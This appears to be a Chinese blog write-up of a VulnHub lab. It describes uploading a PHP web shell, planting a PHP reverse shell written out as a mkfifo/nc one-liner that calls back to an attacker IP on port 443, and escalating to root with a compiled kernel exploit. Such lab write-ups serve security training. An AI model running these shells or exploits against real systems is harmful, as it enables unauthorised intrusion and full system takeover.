type
Post
status
Published
date
Jul 6, 2022
slug
1
summary
内网渗透
tags
vulnhub
category
内网
icon
password
首先配置一下虚拟机,因为ova格式用VM导入的话,是不显示ip的,具体配置网上都有,这里就不说了
配置成功后,在本机上使用arp-scan -l 就可以看到靶机ip(用来验证是否配置成功)
notion image
端口扫描
notion image
开放了80端口,所以直接访问看看,点点点,就发现可疑接口
notion image
写个一句话木马传上去,蚁剑连
notion image
再WordPress下面发现配置文件
notion image
在/var/www/html下有个.backup文件
notion image
然后尝试登录系统,但是并没有发现什么有用的东西,先写个反弹shell吧
notion image
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.248.129 443 >/tmp/f");?>
notion image
kali本地监听443端口,浏览器访问刚才创建的反弹shell的文件2.php 出现下图界面即为反弹成功
notion image
升级tty shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
notion image
查看一下内核版本
notion image
在kali里找一下有没有该版本的漏洞信息,果然发现
notion image
使用命令,把.c文件下下来,然后直接在本地gcc 45010.c -o exp
notion image
编译完成以后我们通过ftp服务上传到靶机中
notion image
再回到靶机那边,给exp权限,最后提权成功
notion image
进入root目录下,发现第二个flag
notion image
《套神看了都摇头》出题记录空白文章10